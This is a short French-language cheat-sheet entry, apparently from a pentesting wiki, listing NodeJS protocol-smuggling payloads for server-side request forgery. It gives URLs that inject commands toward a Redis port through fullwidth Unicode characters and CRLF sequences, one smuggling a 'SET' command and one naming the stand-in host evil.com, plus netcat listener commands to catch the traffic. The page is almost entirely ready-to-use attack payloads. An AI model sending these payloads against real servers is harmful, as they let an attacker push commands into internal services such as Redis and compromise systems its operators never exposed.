Protocol Smuggling

NodeJS

http://target.com:6379/－＊[email protected]@6379－＊

Unicode failure via les caractères U+FF0D et U+FF0A

$ nc -vvlp 6379

http://target.com\r\ntest evil.com 6379\r\n:6379/
http://target.com\r\n test evil.com 6379\r\n :6379/

Le protocole HTTP 1.1 a besoin d'un host header

$ nc -vvlp 6379

https://target.com\r\nSET foo 0 60 5\r\n:443/

$ nc -vvlp 443

Mis à jour il y a 2 ans